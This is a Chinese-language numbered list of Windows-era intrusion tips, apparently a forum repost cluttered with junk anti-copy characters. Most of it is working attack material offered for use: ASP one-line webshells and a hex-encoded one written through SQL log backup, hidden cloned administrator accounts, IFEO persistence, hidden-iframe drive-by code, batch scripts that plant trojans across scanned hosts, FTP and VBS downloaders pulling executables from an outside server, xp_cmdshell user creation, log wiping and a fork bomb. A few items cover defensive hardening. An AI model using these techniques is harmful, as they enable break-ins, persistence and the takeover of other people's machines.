1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,4 O/ X0 B4 p. [" ?1 W
cacls C:\windows\system32 /G hqw20:R, G1 }6 |# k$ z2 `& n
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
1 z# J+ `) F \8 i0 c" B$ j" ]/ |恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
8 B: |* s$ A0 A3 y/ l5 V; o- q+ T7 b8 f+ n; p
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
9 d2 \& T8 w* M: x1 f2 _5 b0 B. k$ c: n
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
9 c- H9 _5 J: U3 E, `) s p1 g$ j
: |( r8 e6 \7 r0 y0 `" ?4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号9 C7 _% o& O& V4 C9 |; Z
8 |$ x$ z4 W& q4 ~' {& c) s5、利用INF文件来修改注册表6 T! g1 u+ S' c1 ^& r3 `
[Version]
h' H1 M4 B7 u& X3 V9 |Signature="$CHICAGO$"
" W2 T4 O7 G# O4 G[Defaultinstall]
2 ]( P% J \: V( c) C6 H) H/ c3 ]- J* {1 `addREG=Ating
& X# L) u1 o$ y9 H& G' r: N3 K[Ating]
! R: {3 z/ r) _7 R* BHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
. Q" X7 r0 x1 ^6 `8 b0 N" K+ V以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:& p# y) \2 _2 J+ m3 Y
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
) L9 D7 e' E$ G其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
6 H9 A2 R' }! ~6 A+ t9 YHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
* C) ]5 ~* Q( tHKEY_CURRENT_CONFIG 简写为 HKCC. k; `0 t* U6 R
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
" k9 B4 M- _6 i9 R9 u) } j"1"这里代表是写入或删除注册表键值中的具体数据
4 g! [, ~. C6 z. L+ q# [2 ?; v# ~5 }7 j. t% S' y, N5 s% e
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,$ {9 o$ ~4 \' N4 J/ x
多了一步就是在防火墙里添加个端口,然后导出其键值
2 c+ o& ^9 z$ Y: v" C* M+ j[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
' g: Y7 J6 l; d; c$ t
* q1 i& y9 a8 s" `2 n% h7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽" ]3 w9 {7 S& X) I2 ~
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
+ A: T* x/ r/ t' J% k
3 q* D" \3 K$ s" A u' g2 f. l8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
! X/ B) P# M2 N0 P- j
$ g; V8 u6 t2 ]3 z/ P" ?* h4 t9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
% Z# W% V' ?% |! \( `0 Q* L/ y可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。3 l; _ G# N* P$ `, i
! F3 i {, j. n' I6 Q5 O. K5 v
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
4 X6 \% U/ M7 ] S% |& E" a# ]+ b( |. \1 W
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 ]3 z' G5 ~+ A- G/ ]8 S/ F用法:xsniff –pass –hide –log pass.txt$ e5 e/ p& c* O5 G
6 r' d& N8 b! \& i/ N5 p2 i
12、google搜索的艺术
Q1 Y, b) d$ ?; l搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”$ V8 U2 d9 ~. U, ^" o7 y% r! _
或“字符串的语法错误”可以找到很多sql注入漏洞。
/ v; V+ ]. l4 {; A0 P" R/ I3 J0 a, i+ e" R: j
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
/ p) l( Z" v6 J( D* w
. I# F) l3 L2 n4 ^/ _8 N14、cmd中输入 nc –vv –l –p 19878 \0 p. K4 z6 }
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃. B# C0 P) u5 ^2 F7 u0 i/ O
8 `4 W" q2 b- `
15、制作T++木马,先写个ating.hta文件,内容为
3 n0 Z! N! Y( _<script language="VBScript">, O7 Z2 K4 J+ p( ?' D
set wshshell=createobject ("wscript.shell" )7 w. e9 m+ v1 ~% X+ k/ c
a=wshshell.run("你马的名称",1)
- n7 X2 h/ p3 s: h" g, D; a G+ O" ewindow.close- N" a" m8 N6 h' J4 r& l. q
</script>+ N$ T* R+ ]" y4 n9 t
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。- Y/ r6 r% o S* z# C; R1 h
8 G8 I+ m1 w2 l' @0 t4 k16、搜索栏里输入
: f. H: b8 ?7 h! T. k8 \关键字%'and 1=1 and '%'='; H, a9 r$ k0 d+ F" @' e+ p; Y. r
关键字%'and 1=2 and '%'='
" j, [. i3 d; C2 p比较不同处 可以作为注入的特征字符3 D# {# s3 L: S' g: J
: E' Z% {; |! t. D( O8 Y! P. f1 d/ \17、挂马代码<html>$ \0 t% f: R! ~& X
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>& l$ }; m/ _7 p; U# T
</html># ]: u% y# H/ T8 G
! \) P! U* W( Z, U, ~
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
a7 ~' P. v- @net localgroup administrators还是可以看出Guest是管理员来。
2 Z: E0 \' k8 {9 ]: H' b9 w+ C. k$ v- {3 |
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等- x2 N# r2 i3 k# F/ J- G/ N
用法: 安装: instsrv.exe 服务名称 路径
1 h6 _/ X1 A8 T# p* r卸载: instsrv.exe 服务名称 REMOVE
& E: t6 p& p, l t) I. d5 [ F
8 O5 E7 g B" V5 }- Z0 j
+ n2 s( g: w8 Q21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
" M" Y$ D0 s9 t不能注入时要第一时间想到%5c暴库。
) H0 y5 l# K' k/ C( `* z) U0 n. b, z9 J
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~6 {. E" J" ~' G7 v2 r5 R2 b
6 l7 m$ I" X7 H3 A23、缺少xp_cmdshell时# @. O5 X3 S. b/ x
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
S6 q" R; M$ R' D0 F假如恢复不成功,可以尝试直接加用户(针对开3389的); d H7 ~/ s4 F+ A* F% F2 u
declare @o int- ~- a/ r" b# \( {
exec sp_oacreate 'wscript.shell',@o out
& i% `. T" C) C- l2 s2 F1 `exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
7 R s0 [8 o/ Q& Y9 A" M* b/ m9 P. G- I, _. [3 l5 U
24.批量种植木马.bat
$ U) \8 O+ U9 ~& y3 S! g& w$ y, O4 vfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中( [4 G+ v$ u- R* U* k# @9 E. O
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间5 `: |6 k% [0 c! _4 S4 x7 W
扫描地址.txt里每个主机名一行 用\\开头' \4 V0 l6 s' o' C% r- {
2 S( S1 l% c2 [( y9 ^* z
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
1 } N5 V5 V: o* m) W. ^9 g' N7 U) Z
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
& ?0 d9 R& B2 x( u. {2 w将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
3 N8 T8 _. ~. e! R2 a.cer 等后缀的文件夹下都可以运行任何后缀的asp木马3 B' y+ ?# E1 ^; r- j
\1 D1 u' b. J
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
5 f9 x& {1 }& T然后用#clear logg和#clear line vty *删除日志8 ~! G$ X: Y. I' H8 u6 W
7 t4 p( t8 k- ]# L# G3 I" R6 `' w% d
28、电脑坏了省去重新安装系统的方法$ h {% n6 \! `4 f7 U; U$ C
纯dos下执行,9 }; F1 M, L* [& \4 v
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config5 N3 K9 K: S6 D
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
3 R; z& t1 k3 y! u7 Z5 d( H( R: Q P. B( q& f( V: _
29、解决TCP/IP筛选 在注册表里有三处,分别是:
- ~% d$ b& ~, U* |- H" g+ IHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip9 w2 d. V& A3 @1 \
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
1 D% Z$ h) M6 H: L1 AHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 }# L: @9 i% z' _分别用/ K. x6 Q& m0 g: P( g! |6 r8 x2 ?7 n1 K
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& L4 F- l& k. Bregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
' W" b5 Y7 |$ Q9 Aregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# e3 {! }# V. v. p9 m; [3 v
命令来导出注册表项
& H; u! b6 R/ H) z: l然后把三个文件里的EnableSecurityFilters"=dword:00000001,
* z* R% U# k4 l0 }/ a) \. K改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用; v8 D' H. `) q4 S% }9 o
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
5 u: j' k0 g6 o, x' l
) {$ K& B8 F% F0 C30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U8 ]7 u$ l% J! E8 i
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
/ W8 L% g Q+ E2 ~9 e" K
( } h1 s( |8 y31、全手工打造开3389工具
) v7 V- z, ?" x0 R3 W6 p打开记事本,编辑内容如下:( i' K# {) S0 n: s" D( g
echo [Components] > c:\sql# }; s3 ~% B- q. E& I
echo TSEnable = on >> c:\sql) t5 ?1 v/ |9 N
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
$ b6 v8 j* L+ X Q编辑好后存为BAT文件,上传至肉鸡,执行
; T+ K" Y6 {, K) N5 r0 ^3 l( e/ O1 D0 D+ _4 E
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马) [0 l$ Y* ], ]' S0 u
i: L5 I7 `5 y33、让服务器重启# u5 }9 k& X% W" @
写个bat死循环:1 H3 A" i9 M- O" [
@echo off& {- K3 g4 P m2 n0 \9 M
:loop1
- @# g: U! h* D/ o: C- a+ Wcls, I2 V" o6 o, l" z) z
start cmd.exe
7 J" l' j" I! L0 Lgoto loop1% S* d+ K& e* j5 p
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
$ p4 o9 J8 A, R5 U# Y& T- ~
- M: U6 t& i. j+ h8 B2 [! E34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
# P/ M& ^9 w3 R$ |9 E( W@echo off' M% `# R- L# z, \; E
date /t >c:/3389.txt! _: _2 m+ H6 T. w6 S
time /t >>c:/3389.txt b$ S: G- C# l( B0 U
attrib +s +h c:/3389.bat" i+ `* m, ?' Y; U# U
attrib +s +h c:/3389.txt9 j: C2 ]1 }! F4 |! _( R
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
* v J$ m1 B+ P5 ~1 ?* l- L并保存为3389.bat
/ X* a4 \; k: i7 F' P打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
" ^$ A3 c7 a7 v* ?* d& f$ t
7 p! [, {- i, N8 @$ x z35、有时候提不了权限的话,试试这个命令,在命令行里输入:$ z/ k" S9 y9 R1 P6 p1 |
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
0 U4 n# E8 _9 g& h8 Q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。8 F' X7 `# \* P8 n8 T1 w3 B- P
5 V, C# }9 Z0 }, R; [) @
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件 ~ M3 Z3 T e+ i" F
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
' D/ R# F% [8 f* I+ {2 A5 S! E9 Recho 你的FTP账号 >>c:\1.bat //输入账号
& f' [" e, P9 |4 S: oecho 你的FTP密码 >>c:\1.bat //输入密码* D1 M) c7 V8 P
echo bin >>c:\1.bat //登入! ~' H+ u* G$ }. V% r+ s
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 E' N7 \4 |& x2 \echo bye >>c:\1.bat //退出
+ {5 P1 @, [2 K. `3 ^然后执行ftp -s:c:\1.bat即可
! }4 F( h8 k/ n
* u2 y, l. X" a1 G3 i2 [4 }+ q37、修改注册表开3389两法$ s1 _2 w* G6 i0 g1 Q- [$ y
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表) o( x% k( u2 M8 \% B2 L4 O2 q
echo Windows Registry Editor Version 5.00 >>3389.reg
& y% w" n% g R! lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg/ ?, s" A, c1 Z" C+ K
echo "Enabled"="0" >>3389.reg
9 n4 G+ I- q4 k" Becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" V& ~0 Q( u( W! W+ o2 G0 Z: s
NT\CurrentVersion\Winlogon] >>3389.reg
v& v" }" l0 q: d3 kecho "ShutdownWithoutLogon"="0" >>3389.reg
4 w. t: g, `- Q0 w3 x: Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
* ^% _- w/ v% A- t5 |, n>>3389.reg, E, p [; _; G6 S. _/ X/ s; O
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg& ]( p4 A9 ]0 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]; f) ?! X$ G5 E
>>3389.reg* a; R7 ~8 X! \2 s/ _& e
echo "TSEnabled"=dword:00000001 >>3389.reg& o8 U8 r/ c' R; ?/ T* Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg8 Y( V9 A% y0 D
echo "Start"=dword:00000002 >>3389.reg) i, y, p. t- S5 X' E' K0 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
# Y5 j1 S" d! Y& O>>3389.reg
2 c! g ^. r( lecho "Start"=dword:00000002 >>3389.reg
. Z! I; m8 Y6 T( becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg1 C- S) l# U$ `+ A9 j: r
echo "Hotkey"="1" >>3389.reg9 ~6 b3 Z. Z5 Q$ p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 H! Y# Y* S E2 e$ z; d7 g
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
4 N, Z" {8 [ a: }3 H8 mecho "PortNumber"=dword:00000D3D >>3389.reg
- f7 C5 K: Q2 S* Q" G( techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* j0 L) K0 |& |5 T8 K1 Z1 i O8 U4 XServer\WinStations\RDP-Tcp] >>3389.reg
; \6 U5 v% L# X# z- B2 k. Fecho "PortNumber"=dword:00000D3D >>3389.reg
7 S9 k6 |& E2 J% p6 U+ `& u把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。3 j7 @* k" X6 z
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)* b) R6 i# ?( s' [0 j
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
& Q6 ^5 A* f. w# A% _(2)winxp和win2003终端开启$ P" B$ i3 j& D
用以下ECHO代码写一个REG文件:
( o P/ h& h7 {: Hecho Windows Registry Editor Version 5.00>>3389.reg/ P* ^- A+ O" L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ V* z5 G) V& u7 R5 D0 SServer]>>3389.reg
, X+ m3 d5 `; G [4 hecho "fDenyTSConnections"=dword:00000000>>3389.reg" E) f% ^8 N' Q4 N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 v/ h* ]5 [3 L6 P1 t/ I7 E3 BServer\Wds\rdpwd\Tds\tcp]>>3389.reg
b. f8 s+ N" ]% C0 f9 U& { }echo "PortNumber"=dword:00000d3d>>3389.reg
. G2 F' q8 ~8 U+ y, Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 Y$ d3 v8 z2 s0 E6 k! I( u
Server\WinStations\RDP-Tcp]>>3389.reg
/ W" d: q; @1 _$ f/ I- K ~9 _echo "PortNumber"=dword:00000d3d>>3389.reg
7 ^6 `$ U Q1 t$ |% @然后regedit /s 3389.reg del 3389.reg5 j2 X3 ~/ ?7 b3 S8 v1 N
XP下不论开终端还是改终端端口都不需重启
/ s) } Q$ C1 ^/ H5 o9 l5 P N; @ i1 m/ a! i n4 p
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( U. X0 E% `4 t5 L- X用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 n# v W1 P/ f: W7 }0 k J
( w& Q5 _' j0 p# _& s
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
+ c" K, j0 S+ S& a(1)数据库文件名应复杂并要有特殊字符- r: ?/ g/ Y. A; t4 T' O
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
/ C9 b @" U/ n% ^1 s将conn.asp文档中的% T. C Y7 m- B( Q4 s7 p% A# ?
DBPath = Server.MapPath("数据库.mdb") Z" G5 \. h4 G9 F( t
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
6 p- w3 f0 W% C e+ M# o/ g
$ p/ y) _& U: }( t2 F' i3 l; ^修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
, `! D. Y/ l8 i( f(3)不放在WEB目录里! w k* s6 w; d/ c1 N
: _- w: j, N7 U; M Q8 h$ H- u40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉; D' ^7 X6 D9 Z# I& T) f' {4 t' U4 H
可以写两个bat文件/ F# O8 v0 N' t) j. G8 }
@echo off
* e! X$ E# m) [: I) f x@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe2 S- R) X. B u' o- B" W/ n
@del c:\winnt\system32\query.exe
3 T! f/ Z. \6 W+ O6 P@del %SYSTEMROOT%\system32\dllcache\query.exe5 q- v O5 s/ ?0 Q/ q( V: W! j
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
" a& C5 p- h! Y. \. y
1 n$ ]: C# F" Q9 q* @: ]@echo off
" b1 ?% {) O- H8 `@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
/ {3 w# L) C8 B9 J$ ~( q7 a@del c:\winnt\system32\tsadmin.exe9 {6 E( n2 z3 v& G7 @9 e
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
/ C/ Z3 R' w& \7 k
% T+ a/ t5 c' u$ d8 i41、映射对方盘符
& \' ~' J! u% I K# l9 j) rtelnet到他的机器上,
1 m2 F" j3 [* ?& M' K2 ]net share 查看有没有默认共享 如果没有,那么就接着运行' Q* i) \' ^. w3 g3 v" F C
net share c$=c:
# ?5 c/ W+ s2 ^: _& r9 a# Z1 _, Tnet share现在有c$
( Z# M* a, P$ e g在自己的机器上运行
9 t8 {8 {* j" V) D Bnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
* d0 v! f0 u& D! |. {0 b9 T5 _7 U* n& j9 r+ h) l4 Z
42、一些很有用的老知识
) `3 }9 z2 r( J2 z2 D; Y- p0 K9 Ktype c:\boot.ini ( 查看系统版本 )
" Q9 z' q3 q& x. e: z% z3 ?net start (查看已经启动的服务)
' x7 \" z, x) l: H' n$ ^query user ( 查看当前终端连接 )
$ M9 g) q* Y$ k2 [" d9 enet user ( 查看当前用户 )+ e( h/ h9 s8 d `* X) O! t8 f Z# P& {6 [
net user 用户 密码/add ( 建立账号 )4 x, M! E' U6 B! J
net localgroup administrators 用户 /add (提升某用户为管理员)
6 Y! @1 i: E. m5 h! ]2 Kipconfig -all ( 查看IP什么的 )( r- v' S& E) j' J& M) h
netstat -an ( 查看当前网络状态 )
5 B4 E0 O3 @' z9 P% ]4 P' m Qfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
9 w$ Z, T2 A8 Z# W克隆时Administrator对应1F4
/ J! t6 i8 O4 Nguest对应1F51 C! s; B7 M; }" n! ?
tsinternetuser对应3E8
' S; V; K. U4 Q2 a; }; U5 J' r& G2 c4 O3 N& ~) ~2 b9 \; W
43、如果对方没开3389,但是装了Remote Administrator Service
- E4 `6 `" \5 U; ~+ j) c: b5 g用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接' c( c3 Q+ i. ~, h; n5 G
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
- J+ E9 h8 N, q$ c+ ]4 Y先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"% \9 P2 f' `2 m2 b' I3 o
4 X6 H6 b2 ^, e& z2 g9 P0 r44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)6 ~+ Z( X+ L. i3 `3 g) \" \
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
) c3 C1 e6 H: ]* G' F1 ]( S( L1 C% }/ G' k6 k z/ A. f$ N6 o
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
2 k9 N1 f6 }: G; p' Z7 i0 lecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
a- e: w8 p1 l8 N5 j# p^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ k- y$ v& l& K9 h! p& C8 R, b' g/ iCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =1 u2 y N/ t* l9 o
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
5 i2 U7 `# l9 Z, u(这是完整的一句话,其中没有换行符)
' E% K5 m; l; b6 b. a0 n5 _0 a, L然后下载:% a" t; V( L) I9 z/ [3 f( B7 X0 [
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
+ E0 i- {( N9 M2 o, d% c
$ `3 H$ V' ~+ f! Y/ M1 a46、一句话木马成功依赖于两个条件:
) |! }' Z" ~2 }+ T1、服务端没有禁止adodb.Stream或FSO组件9 L9 A$ [, {% C- @1 Y
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。: g8 K- e7 d9 S6 G
* |% M5 V3 h0 N" C% A8 d
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
$ B4 g7 D7 {/ C: e8 A+ t- [;alter database utsz set RECOVERY FULL--
# {6 p, O3 `$ e4 b;create table cmd (a image)--
6 P! w% Z, n/ g;backup log utsz to disk = 'D:\cmd' with init--3 a. j0 J% n% A+ H! }
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--+ X+ V7 H4 D1 l
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'-- W. c( j: x0 ]* z$ @& J
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。% q% ~% i4 D# j( V e7 a
3 n5 J: ^4 F, D* f0 p8 \
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:5 ? n0 O% B' o* G3 F
! ^4 r7 m- [; P7 }用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options* U# _: o9 e N! U! V- I
所有会话用 'all'。
1 |6 i) f0 i) c7 k) G-s sessionid 列出会话的信息。
- x1 Z6 o5 X# g7 R-k sessionid 终止会话。+ I; M# `% ]! t s3 }: ~
-m sessionid 发送消息到会话。
" Z3 {+ z7 |! o2 o; f' ^2 \ u9 { ?1 @0 S* j) z) v$ A' {
config 配置 telnet 服务器参数。
7 v+ P+ L U) r* N9 H4 j3 J, A+ @9 G9 D Y$ e% M$ Y8 n6 [
common_options 为:
* p: C& g3 Q7 D- _- p- w8 T+ b8 }6 r% b-u user 指定要使用其凭据的用户
% c, W7 \# X+ _. [-p password 用户密码1 m2 o- f1 n% k- s
, I4 g3 w# \% A: L @: Q
config_options 为:
, f. I/ f6 G! b8 j6 c" Pdom = domain 设定用户的默认域
8 t2 |% A* W$ r2 cctrlakeymap = yes|no 设定 ALT 键的映射
3 [* o* E F% g# u5 i5 Ztimeout = hh:mm:ss 设定空闲会话超时值( S! `$ w- {1 I! n6 R4 G* ]
timeoutactive = yes|no 启用空闲会话。
. E! \* e' F' W' D8 umaxfail = attempts 设定断开前失败的登录企图数。- Z' a! [. }/ j& x
maxconn = connections 设定最大连接数。6 [: b% x t# k1 s6 Q% I# x
port = number 设定 telnet 端口。# b8 v; @7 I4 }6 a
sec = [+/-]NTLM [+/-]passwd8 D: k- w' g: {, o' j0 w
设定身份验证机构
9 [' f" m$ C* r8 [% ?fname = file 指定审计文件名。
6 O1 E0 C5 o0 {/ a+ K- a& G" bfsize = size 指定审计文件的最大尺寸(MB)。
" A' B3 ?% ?- `% amode = console|stream 指定操作模式。- f$ w& j9 b E7 k( ]. m1 L$ C( Z
auditlocation = eventlog|file|both3 L4 _ T7 G! a4 g# Q& e0 c D4 [
指定记录地点
7 E) q$ p/ S' p( eaudit = [+/-]user [+/-]fail [+/-]admin5 U* w: p" L+ @# a
2 H- j* T) t: Z( J; z: |) A
49、例如:在IE上访问:' c' J c8 C7 r9 ~% J5 i
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/1 b% L0 \4 ^# s q' S% F O
hack.txt里面的代码是:/ C8 Z3 o$ T4 X$ I z- M
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"># V' z2 k" b0 z% P
把这个hack.txt发到你空间就可以了!
* L0 w* u+ \1 s7 W' Y这个可以利用来做网马哦!
* t! n$ u5 D: W& R
5 b+ f+ l- O- \7 X$ I" \+ z50、autorun的病毒可以通过手动限制!
+ H2 ~- ^7 M$ F5 v# ?0 q0 \+ c. \$ ?7 \3 w1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!& i U+ [8 o8 ?# y
2,打开盘符用右键打开!切忌双击盘符~
5 B$ G/ A Q4 S7 ~/ R3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
+ i, Z& |% _* [- J* r3 n" ?: Y1 J
) Z# q R' E3 r7 {/ I" s2 Y51、log备份时的一句话木马:6 U8 z+ V- _ u7 g, |+ F2 S
a).<%%25Execute(request("go"))%%25>% r6 h: v, m: y7 e- K9 T2 k
b).<%Execute(request("go"))%>
. [ i& c0 e4 d! wc).%><%execute request("go")%><%1 T( n9 s# _* r
d).<script language=VBScript runat=server>execute request("sb")</Script> P H% r) S# l
e).<%25Execute(request("l"))%25>
3 u2 G' N9 D9 h+ ^& U6 Uf).<%if request("cmd")<>"" then execute request("pass")%>
& _; N: O. z6 l2 W% Z
/ u, c9 \1 G+ X/ y52、at "12:17" /interactive cmd/ v4 q% v; k& {0 }5 i! D2 P, s
执行后可以用AT命令查看新加的任务
